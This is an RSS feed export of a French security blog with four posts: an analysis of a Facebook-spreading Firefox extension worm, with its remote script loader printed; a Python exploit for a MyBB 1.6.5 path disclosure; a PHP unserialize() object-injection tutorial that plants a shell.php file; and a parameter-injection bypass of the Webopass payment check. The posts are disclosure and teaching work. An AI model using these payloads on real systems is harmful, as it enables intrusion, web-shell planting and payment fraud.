<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>tlk&#039;s space</title>
	<atom:link href="http://tlking.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://tlking.wordpress.com</link>
	<description>oké?</description>
	<lastBuildDate>Wed, 22 Feb 2012 08:25:20 +0000</lastBuildDate>
	<language>fr</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='tlking.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>tlk&#039;s space</title>
		<link>http://tlking.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://tlking.wordpress.com/osd.xml" title="tlk&#039;s space" />
	<atom:link rel='hub' href='http://tlking.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Un ver facebook dans un module firefox</title>
		<link>http://tlking.wordpress.com/2012/01/16/un-ver-facebook-dans-un-module-firefox/</link>
		<comments>http://tlking.wordpress.com/2012/01/16/un-ver-facebook-dans-un-module-firefox/#comments</comments>
		<pubDate>Mon, 16 Jan 2012 10:18:03 +0000</pubDate>
		<dc:creator>TheLizardKing - tlk</dc:creator>
				<category><![CDATA[Général]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://tlking.wordpress.com/?p=108</guid>
		<description><![CDATA[EDIT 18/01/2012 &#8211; 12h57 : Visiblement l&#8217;auteur du bouzin a modifié le truc, je regarde ça et j&#8217;édite l&#8217;article Je traînais sur facebook jusqu&#8217;à ce que je tombe sur une page à boulet : Les 5 trucs que font toutes les filles avant de retrouver leur mec &#8230; Et là, à ma grande surprise, la... <a href="http://tlking.wordpress.com/2012/01/16/un-ver-facebook-dans-un-module-firefox/">Lire la suite.</a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tlking.wordpress.com&amp;blog=24870245&amp;post=108&amp;subd=tlking&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:justify;"><span style="color:#ffff00;"><strong>EDIT 18/01/2012 &#8211; 12h57 : Visiblement l&#8217;auteur du bouzin a modifié le truc, je regarde ça et j&#8217;édite l&#8217;article <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </strong></span></p>
<p style="text-align:justify;">Je traînais sur facebook jusqu&#8217;à ce que je tombe sur une page à boulet : <a href="http://lala">Les 5 trucs que font toutes les filles avant de retrouver leur mec</a> &#8230; Et là, à ma grande surprise, la page me redirige vers un site! Probablement grâce à un morceau de code javascript, mais je vais vous laisser enquêter sur ça <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p style="text-align:justify;">Bref, je me retrouve donc sur une page qui a tout l&#8217;air d&#8217;<a href="http://lesfrancais.info/trucs/menu.php">une page de phishing</a>. On remarque immédiatement que le but de la page est de faire télécharger une extension à l&#8217;utilisateur. Le cadre avec la vidéo youtube-like est en fait un iframe pointant vers <a href="http://lesfrancais.info/creme.php">http://lesfrancais.info/creme.php</a>. En explorant le code source de cette page, on trouve le lien vers l&#8217;<a href="http://lesfrancais.info/trucs.xpi">extension Firefox</a> que le site veut nous faire télécharger.</p>
<p style="text-align:justify;">A partir de ce moment là, je me retrouve avec une extension firefox en .xpi dont je ne sais que faire. Je décide donc de regarder ce que me renvois la commande <em>file</em>.</p>
<p><pre class="brush: plain; gutter: false;">

$ file trucs.xpi
trucs.xpi: Zip archive data, at least v2.0 to extract

</pre></p>
<p style="text-align:justify;">Ôh magie, un fichier ZIP! Je m&#8217;empresse de le dé-zipper. Et voici ce que je découvre :</p>
<p><pre class="brush: plain; gutter: false;">

$ ls -ls
total 72
8 -rw-r--r--@ 1 tlk  staff    173 22 déc 23:09 chrome.manifest
8 -rw-r--r--@ 1 tlk  staff    149  6 déc 18:56 chrome.txt
0 drwxr-xr-x  8 tlk  staff    272  1 jan 20:45 content
8 -rw-r--r--@ 1 tlk  staff    924  3 jan 00:38 install.rdf
8 -rw-r--r--@ 1 tlk  staff   1231  3 jan 00:38 install.txt

</pre></p>
<p style="text-align:justify;">Je regarde vite fait ce que contiennent les fichiers <em>install.rdf, install.txt, chrome.manifest et chrome.txt</em>. Mais rien de bien cool, sauf peut être un site internet, mais qui visiblement ne correspond à rien (un whois qui indique une personne n&#8217;habitant pas en france, même chose pour les autres domaines que l&#8217;on va rencontrer)</p>
<p style="text-align:justify;">Le dossier <em>content</em> contient plusieurs fichiers javascript dont je ne sait pas à quoi ils peuvent correspondre. Le seul fichier qui me paraît intéressant se nomme <em>youtube.js</em></p>
<p><pre class="brush: jscript;">

loadScript_you();
function loadScript_you() {
if ('https:' == document.location.protocol) return false;
var s = document.createElement('script');
s.setAttribute(&quot;type&quot;,&quot;text/javascript&quot;);
s.setAttribute(&quot;src&quot;, &quot;http://les-francais.info/g.js&quot;);
var head=document.getElementsByTagName(&quot;head&quot;)[0];
if( head==null) return false;
head.appendChild(s);
return true;
}

</pre></p>
<p style="text-align:justify;">Le code javascript ajoute une balise script dans la balise head de la page. Ce qui va charger un <a href="http://les-francais.info/g.js">nouveau code javascript.</a></p>
<p><pre class="brush: jscript;">
&lt;pre&gt;function addScript() {
        var s = document.createElement('script');
        s.setAttribute(&quot;type&quot;, &quot;text/javascript&quot;);
        s.setAttribute(&quot;src&quot;, &quot;http://buzz-france.info/w.js&quot;);
        var a = document.getElementsByTagName('script')[0];
        if (a == null) return false;
        a.appendChild(s);
        return true
}
addScript();
var installed = 1;&lt;/pre&gt;
</pre></p>
<p style="text-align:justify;">On regarde le <a href="http://buzz-france.info/w.js">nouveau code javascript </a>qui est chargé dans le navigateur&#8230; Et là, on rigole. Voici en gros ce que réalise ce script : il vous fait <em>liker</em> une de ces 5 pages :</p>
<ul>
<li><a href="https://www.facebook.com/profile.php?id=154794704624877">https://www.facebook.com/profile.php?id=154794704624877</a></li>
<li><a href="https://www.facebook.com/profile.php?id=280169568699504">https://www.facebook.com/profile.php?id=280169568699504</a></li>
<li><a href="https://www.facebook.com/profile.php?id=268526349850504">https://www.facebook.com/profile.php?id=268526349850504</a></li>
<li><a href="https://www.facebook.com/profile.php?id=347601538583293">https://www.facebook.com/profile.php?id=347601538583293</a></li>
<li><a href="https://www.facebook.com/profile.php?id=343275379035315">https://www.facebook.com/profile.php?id=343275379035315</a></li>
</ul>
<p>(Les deux derniers liens permettent de voir que la personne n&#8217;en est pas à son coup d&#8217;essai <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> )</p>
<p style="text-align:justify;">Le script va aussi marquer certains de vos amis sur des photos, changer votre statut et d&#8217;autres choses qui ont pour but de faire télécharger au plus de personne possible l&#8217;extension firefox.</p>
<p style="text-align:justify;">Autre chose assez fun : l&#8217;auteur a pensé à mettre <a href="http://whos.amung.us/widget/ncosqdqleyjd.pnh">un compteur pour voir le nombre de personne</a> qui sont actuellement sur facebook et qui ont l&#8217;extension activée. A l&#8217;heure où je publie l&#8217;article, le compteur est à environ 800, hier soir il était à plus de 3000 <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p style="text-align:justify;">En bref, un module firefox est un véritable point d&#8217;entré sur le navigateur d&#8217;un utilisateur. On peut enregistrer tout ce que l&#8217;utilisateur va valider comme formulaire, voir sur quels sites il va se balader, etc &#8230; Un véritable petit rootkit pour navigateur.</p>
<p style="text-align:justify;"><span style="color:#ffff00;"><strong>EDIT DU 18/01/2012 &#8211; 13h01 :</strong></span></p>
<p style="text-align:justify;">Le téléchargement de l&#8217;extension se fait maintenant depuis<a href="http://buzz-france.info/araignee/essentials.xpi"> cette adresse.</a></p>
<p style="text-align:justify;">Le premier fichier a changé d&#8217;adresse, ainsi que le second : <a href="http://buzz-france.info/f.js">premier fichier</a>, <a href="http://buzz-france.info/r.js">second fichier</a>.</p>
<p style="text-align:justify;">Les différentes pages que l&#8217;utilisateur va partager par différents moyens :</p>
<ul>
<li><a href="https://www.facebook.com/profile.php?id=265592873507963">https://www.facebook.com/profile.php?id=265592873507963</a></li>
<li><a href="https://www.facebook.com/profile.php?id=333585419995353">https://www.facebook.com/profile.php?id=333585419995353</a></li>
<li><a href="https://www.facebook.com/profile.php?id=152404644871854">https://www.facebook.com/profile.php?id=152404644871854</a></li>
<li><a href="https://www.facebook.com/profile.php?id=238426396233549">https://www.facebook.com/profile.php?id=238426396233549</a></li>
<li><a href="https://www.facebook.com/profile.php?id=302177653165925">https://www.facebook.com/profile.php?id=302177653165925</a></li>
<li><a href="https://www.facebook.com/profile.php?id=330048160361108">https://www.facebook.com/profile.php?id=330048160361108</a></li>
<li><a href="https://www.facebook.com/profile.php?id=351463374881223">https://www.facebook.com/profile.php?id=351463374881223</a></li>
<li><a href="https://www.facebook.com/profile.php?id=222923384459049">https://www.facebook.com/profile.php?id=222923384459049</a></li>
<li><a href="https://www.facebook.com/profile.php?id=340313475992556">https://www.facebook.com/profile.php?id=340313475992556</a></li>
<li><a href="https://www.facebook.com/profile.php?id=287795674611208">https://www.facebook.com/profile.php?id=287795674611208</a></li>
<li><a href="https://www.facebook.com/profile.php?id=277490065649139">https://www.facebook.com/profile.php?id=277490065649139</a></li>
<li><a href="https://www.facebook.com/profile.php?id=132362790216004">https://www.facebook.com/profile.php?id=132362790216004</a></li>
</ul>
<p style="text-align:justify;">L&#8217;adresse du compteur a aussi changé : <a href="http://whos.amung.us/widget/ncosqdqleyji.pnh">compteur</a>. Visiblement, l&#8217;auteur n&#8217;a toujours pas compris qu&#8217;il pouvait faire des choses bien plus dévastatrices. (et tant mieux!)</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tlking.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tlking.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tlking.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tlking.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tlking.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tlking.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tlking.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tlking.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tlking.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tlking.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tlking.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tlking.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tlking.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tlking.wordpress.com/108/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tlking.wordpress.com&amp;blog=24870245&amp;post=108&amp;subd=tlking&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tlking.wordpress.com/2012/01/16/un-ver-facebook-dans-un-module-firefox/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2b9ac3dce6a032b77b5efbc3859b55c2?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tlking</media:title>
		</media:content>
	</item>
		<item>
		<title>MyBB 1.6.5 &#8211; Full Path Disclosure</title>
		<link>http://tlking.wordpress.com/2012/01/07/mybb-1-6-5-full-path-disclosure/</link>
		<comments>http://tlking.wordpress.com/2012/01/07/mybb-1-6-5-full-path-disclosure/#comments</comments>
		<pubDate>Sat, 07 Jan 2012 15:52:49 +0000</pubDate>
		<dc:creator>TheLizardKing - tlk</dc:creator>
				<category><![CDATA[Général]]></category>
		<category><![CDATA[PoC]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://tlking.wordpress.com/?p=89</guid>
		<description><![CDATA[Pour bien commencer l&#8217;année 2012, voici une full path disclosure dans la lignée de mon dernier article. Dans la dernière version de MyBB (1.6.5), index.php ligne 323 : Les cookies n&#8217;étant absolument pas filtré, il suffit de mettre dans le cookie &#8220;mybb[forumread]&#8221; (déduit après analyse du code) une instance de classe serializé qui existe ou... <a href="http://tlking.wordpress.com/2012/01/07/mybb-1-6-5-full-path-disclosure/">Lire la suite.</a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tlking.wordpress.com&amp;blog=24870245&amp;post=89&amp;subd=tlking&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:justify;">Pour bien commencer l&#8217;année 2012, voici une <a href="https://www.owasp.org/index.php/Full_Path_Disclosure">full path disclosure</a> dans la lignée de <a title="La faille unserialize() de PHP" href="http://tlking.wordpress.com/2011/10/27/la-faille-unserialize-de-php/">mon dernier article. </a></p>
<p style="text-align:justify;">Dans la dernière version de MyBB (1.6.5), index.php ligne 323 :</p>
<p><pre class="brush: php;">

if($mybb-&gt;user['uid'] == 0)
{
// Build a forum cache.
$query = $db-&gt;query(&quot;
SELECT *
FROM &quot;.TABLE_PREFIX.&quot;forums
WHERE active != 0
ORDER BY pid, disporder
&quot;);

$forumsread = unserialize($mybb-&gt;cookies['mybb']['forumread']);
}

</pre></p>
<p>Les cookies n&#8217;étant absolument pas filtré, il suffit de mettre dans le cookie &#8220;mybb[forumread]&#8221; (déduit après analyse du code) une instance de classe <em>serializé</em> qui existe ou non dans le code. Nous récupérerons alors une <em>fatal error</em> car la variable <em>$forumsread</em> est utilisé plus bas comme un tableau.</p>
<p>Exploit en Python :</p>
<p><pre class="brush: python; collapse: false; wrap-lines: false;">
#!/usr/bin/env python
# encoding: utf-8
&quot;&quot;&quot;
MyBB 1.6.5 Full Path Disclosure
http://tlking.wordpress.com/
&quot;&quot;&quot;

import httplib
import sys

if __name__ == &quot;__main__&quot;:
	
    if len(sys.argv) != 3:
        print(&quot;Usage :&quot;)
        print(&quot;\t{0} host path&quot;.format(sys.argv[0]))
        print(&quot;Exemple :&quot;)
        print(&quot;\t{0} \&quot;demo.forum-software.org:80\&quot; \&quot;/mybb/\&quot;&quot;.format(sys.argv[0]))
        sys.exit(0)
		
    host = sys.argv[1]
    path = sys.argv[2]
	
    print(&quot;Launch attack on : http://{0}{1}/index.php&quot;.format(host,path))
	
    path += &quot;/index.php&quot;
    headers = {&quot;Cookie&quot;:&quot;mybb[forumread]=O%3A10%3A%22TlkMyBBFPD%22%3A0%3A%7B%7D;&quot;}
	
    connexion = httplib.HTTPConnection(host)
    connexion.request(&quot;GET&quot;,path, &quot;&quot;, headers)
    reponse = connexion.getresponse()
    data = reponse.read()
	
    if data.count(&quot;Fatal error&quot;) &gt; 0:
        print(&quot;\nIt's work :&quot;)
        print(data)
    else:
        print(&quot;Don't work... Want to see the result anyway ? (1/0)&quot;)
        question = input()
        if question == 1:
            print(data)
</pre></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tlking.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tlking.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tlking.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tlking.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tlking.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tlking.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tlking.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tlking.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tlking.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tlking.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tlking.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tlking.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tlking.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tlking.wordpress.com/89/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tlking.wordpress.com&amp;blog=24870245&amp;post=89&amp;subd=tlking&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tlking.wordpress.com/2012/01/07/mybb-1-6-5-full-path-disclosure/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2b9ac3dce6a032b77b5efbc3859b55c2?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tlking</media:title>
		</media:content>
	</item>
		<item>
		<title>La faille unserialize() de PHP</title>
		<link>http://tlking.wordpress.com/2011/10/27/la-faille-unserialize-de-php/</link>
		<comments>http://tlking.wordpress.com/2011/10/27/la-faille-unserialize-de-php/#comments</comments>
		<pubDate>Thu, 27 Oct 2011 10:20:46 +0000</pubDate>
		<dc:creator>TheLizardKing - tlk</dc:creator>
				<category><![CDATA[Général]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://tlking.wordpress.com/?p=62</guid>
		<description><![CDATA[Pour bien comprendre cet article il est nécessaire d&#8217;avoir des bases en Programmation Orientée Objet PHP. Cela dit, c&#8217;est aussi compréhensible par le commun des mortels&#8230; La première chose à savoir, c&#8217;est le fonctionnement du couple de fonction serialize() et unserialize(). Ces fonctions garderons le type et la structure de la variable donnée en paramètre.... <a href="http://tlking.wordpress.com/2011/10/27/la-faille-unserialize-de-php/">Lire la suite.</a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tlking.wordpress.com&amp;blog=24870245&amp;post=62&amp;subd=tlking&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:justify;">Pour bien comprendre cet article il est nécessaire d&#8217;avoir des bases en Programmation Orientée Objet PHP. Cela dit, c&#8217;est aussi compréhensible par le commun des mortels&#8230;</p>
<p style="text-align:justify;">La première chose à savoir, c&#8217;est le fonctionnement du couple de fonction <a href="http://php.net/manual/fr/function.serialize.php">serialize()</a> et <a href="http://www.php.net/manual/fr/function.unserialize.php">unserialize()</a>. Ces fonctions garderons le type et la structure de la variable donnée en paramètre. Ces deux fonctions peuvent donc aussi bien être utilisé sur des tableaux (array) que sur des instances d&#8217;objet.</p>
<p><pre class="brush: php;">
$bool = true;
$string = &quot;true&quot;;

class TlkClass {
private $foo = &quot;bar&quot;;
private $bool = false;
}

$objet = new TlkClass();

echo serialize($bool).&quot;\n&quot;;
echo serialize($string).&quot;\n&quot;;
echo serialize($objet).&quot;\n&quot;;

</pre></p>
<p>Ce script vas donc renvoyer :</p>
<blockquote>
<pre>b:1;
s:4:"true";
O:8:"TlkClass":2:{s:13:"TlkClassfoo";s:3:"bar";s:14:"TlkClassbool";b:0;}</pre>
</blockquote>
<p style="text-align:justify;">Ce qui va nous intéresser c&#8217;est surtout les objets linéarisé, cependant, comme <a href="http://php.net/manual/fr/function.serialize.php">serialize()</a> vas garder le type de la variable, un bypass authentification pourra être envisageable dans certains cas un peut (beaucoup?) foireux (rencontré dans un hackit). Je donnerais un exemple plus bas.</p>
<p style="text-align:justify;">Il faut aussi savoir que lorsque un objet linéarisé passe dans la fonction <a href="http://php.net/manual/fr/function.unserialize.php">unserialize()</a> la méthode magique <strong>__wakeup()</strong> sera appelée par PHP. (lorsque un objet est linéarisé c&#8217;est la méthode magique<strong> __sleep()</strong> qui est appelée, mais dans notre cas nous en auront très rarement besoin). L&#8217;autre méthode magique à connaître est la méthode <strong>__destruct()</strong> qui elle est appelée lorsque l&#8217;objet est détruit (donc à la fin du script ou lors de l&#8217;utilisation d&#8217;<a href="http://php.net/manual/fr/function.unset.php">unset()</a>).</p>
<p style="text-align:justify;">Imaginons maintenant que le développeur a laissé dans son code une variable qui peut être contrôlé par l&#8217;utilisateur et qui est passé dans la fonction <a href="http://php.net/manual/fr/function.unserialize.php">unserialize()</a>. Que l&#8217;attaquant possède le code (comme il est possible avec les CMS) et que le script utilise une classe ayant une méthode <strong>__wakeup()</strong> ou <strong>__destruct()</strong> écrivant des fichiers, en incluant&#8230; (tout autre type de faille est possible : SQL Injection, &#8230;.) L&#8217;attaquant pourra sans aucun problème exploiter la faille.</p>
<h3 style="text-align:justify;">Exemple</h3>
<p><pre class="brush: php;">

class CacheClass {

private $fileName;
private $contenu = &quot;default&quot;;

public function __construct()
{
$this-&gt;fileName = md5(rand()).&quot;.cache&quot;;
}

public function getContenu()
{
return $this-&gt;contenu;
}

public function setContenu($contenu)
{
$this-&gt;contenu = $contenu;
}

public function __destruct()
{
$file = fopen(&quot;./cacheDir/&quot;.$this-&gt;fileName,&quot;w+&quot;);
fwrite($file,$this-&gt;contenu);
fclose($file);
}
}

$user = unserialize(base64_decode($_GET['user']));

if($user['password'] == &quot;Le Password Impossible à Trouver!&quot;) {
phpinfo();
}

</pre></p>
<p style="text-align:justify;">Nous avons deux but sur cet exemple, afficher le <a href="http://fr2.php.net/phpinfo">phpinfo()</a> et uploader notre propre fichier php.</p>
<h3>Afficher le phpinfo</h3>
<p style="text-align:justify;">Comme la fonction <a href="http://fr2.php.net/serialize">serialize()</a> garde le type de la variable, il va être facile d&#8217;afficher le phpinfo en mettant comme valeur pour l&#8217;index &#8216;password&#8217; un booléen &#8220;True&#8221;. Pour cela rien de plus simple :</p>
<p><pre class="brush: php;">

$var = array('password' =&gt; true);
var_dump(base64_encode(serialize($var)));

</pre></p>
<p style="text-align:justify;">Ainsi, il suffira de donner la valeur affiché à notre variable get user pour appeler la fonction <a href="http://fr2.php.net/phpinfo">phpinfo()</a>.</p>
<h3>Uploader notre propre fichier</h3>
<p style="text-align:justify;">Le principe est exactement le même, sauf que cette fois ci nous allons passer en paramètre une instance linéarisé de la classe <strong>CacheClass</strong>.</p>
<p><pre class="brush: php;">

class CacheClass {
private $fileName = 'shell.php';
private $contenu = '&lt;?php phpinfo();';
}

$var = array(
'password' =&gt; false,
'object' =&gt; new CacheClass(),
);

var_dump(base64_encode(serialize($var)));

</pre></p>
<p style="text-align:justify;">Ici, nous somme obligé de donner un Array avec un index &#8216;password&#8217; car sinon, le script php plante (il affiche une erreur disant : &#8220;Fatal Error: Cannot use object of type CacheClass as array&#8221;) et la méthode <strong>__destruct()</strong> n&#8217;est pas appelée.</p>
<p style="text-align:justify;">De la même manière, il suffit d&#8217;affecter la valeur renvoyé par notre script à notre variable get &#8216;user&#8217; et le tour est joué! Un fichier nommé shell.php contenant notre code malicieux est créé.</p>
<p style="text-align:justify;"><strong>Et comme à chaque article, je suis ouvert à toute critique ! (approbations, insultes, fautes d’orthographe…)</strong></p>
<p style="text-align:justify;">N&#8217;hésitez surtout pas à me suivre sur<a href="http://twitter.com/j_boutoille"> mon Twitter</a>!<strong><br />
</strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tlking.wordpress.com/62/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tlking.wordpress.com/62/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tlking.wordpress.com/62/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tlking.wordpress.com/62/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tlking.wordpress.com/62/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tlking.wordpress.com/62/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tlking.wordpress.com/62/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tlking.wordpress.com/62/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tlking.wordpress.com/62/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tlking.wordpress.com/62/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tlking.wordpress.com/62/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tlking.wordpress.com/62/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tlking.wordpress.com/62/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tlking.wordpress.com/62/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tlking.wordpress.com&amp;blog=24870245&amp;post=62&amp;subd=tlking&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tlking.wordpress.com/2011/10/27/la-faille-unserialize-de-php/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2b9ac3dce6a032b77b5efbc3859b55c2?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tlking</media:title>
		</media:content>
	</item>
		<item>
		<title>Webopass ? Bypass.</title>
		<link>http://tlking.wordpress.com/2011/09/10/webopass-bypass-faille-contournement/</link>
		<comments>http://tlking.wordpress.com/2011/09/10/webopass-bypass-faille-contournement/#comments</comments>
		<pubDate>Sat, 10 Sep 2011 17:57:03 +0000</pubDate>
		<dc:creator>TheLizardKing - tlk</dc:creator>
				<category><![CDATA[Général]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://tlking.wordpress.com/?p=46</guid>
		<description><![CDATA[J&#8217;étais entrain de chercher dans la documentation de Webopass pour savoir comment leur API fonctionne et donc comment réaliser un système de validation du code sans passer par leur formulaire. Je vais donc sur le wiki puis sur la page Intégration en PHP. Et là&#8230; C&#8217;est le drame. On rencontre un script php qui à... <a href="http://tlking.wordpress.com/2011/09/10/webopass-bypass-faille-contournement/">Lire la suite.</a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tlking.wordpress.com&amp;blog=24870245&amp;post=46&amp;subd=tlking&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:justify;">J&#8217;étais entrain de chercher dans la documentation de <a href="http://webopass.fr/" target="_blank">Webopass</a> pour savoir comment leur API fonctionne et donc comment réaliser un système de validation du code sans passer par leur formulaire. Je vais donc sur le <a href="http://www.webopass.fr/wiki/doku.php" target="_blank">wiki</a> puis sur la page <a href="http://www.webopass.fr/wiki/doku.php?id=integration_en_php" target="_blank">Intégration en PHP. </a></p>
<p style="text-align:justify;">Et là&#8230; C&#8217;est le drame. On rencontre un script php qui à première vu a l&#8217;air de fonctionner sans aucun soucis, mais en réalité si le codeur intègre ce code à son site, le client pourra s&#8217;il le veut, payer gratuitement! Voici le code en question :</p>
<p><pre class="brush: php;">&lt;?php
$code = &quot;abc&quot;;

$test = @file(&quot;http://payer.webopass.fr/valider_code.php?cc=XXXX&amp;amp;document=YYYY&amp;amp;requete=1&amp;amp;code=$code&quot;);
$test[0] = trim($test[0]);

if($test[0] == &quot;OUI&quot;) echo &quot;Le code est valide&quot;;
elseif($test[0] == &quot;NON&quot;) echo &quot;Le code est invalide&quot;;</pre></p>
<p style="text-align:justify;">Bon, évidemment on remplace le <em>$code = &#8220;abc&#8221;;</em> par quelque chose dans ce genre : <em>$code = $_GET['code'];</em>.</p>
<p style="text-align:justify;">Si le client malveillant a un compte webopass (compte que tout le monde peut créer gratuitement !), que sur ce compte se trouve un document payant et que le code de test est configuré, le client aura la possibilité d&#8217;accéder au document payant gratuitement. Il lui suffira d&#8217;envoyer une requête dans ce genre :<em> acces.php?code=codeDeTest%26cc=idDuCompteClient%26document=idDuDocumentPayant</em></p>
<p><a href="http://payer.webopass.fr/valider_code.php?cc=4075041044&amp;document=6201349581&amp;requete=1&amp;code=kikiki&amp;document=8924182041&amp;cc=1733668204&amp;no_saisie_code=1">Voir un exemple</a></p>
<p style="text-align:justify;">Encore une fois, je suis ouvert à toute critique ! (approbations, insultes, fautes d&#8217;orthographe&#8230;)</p>
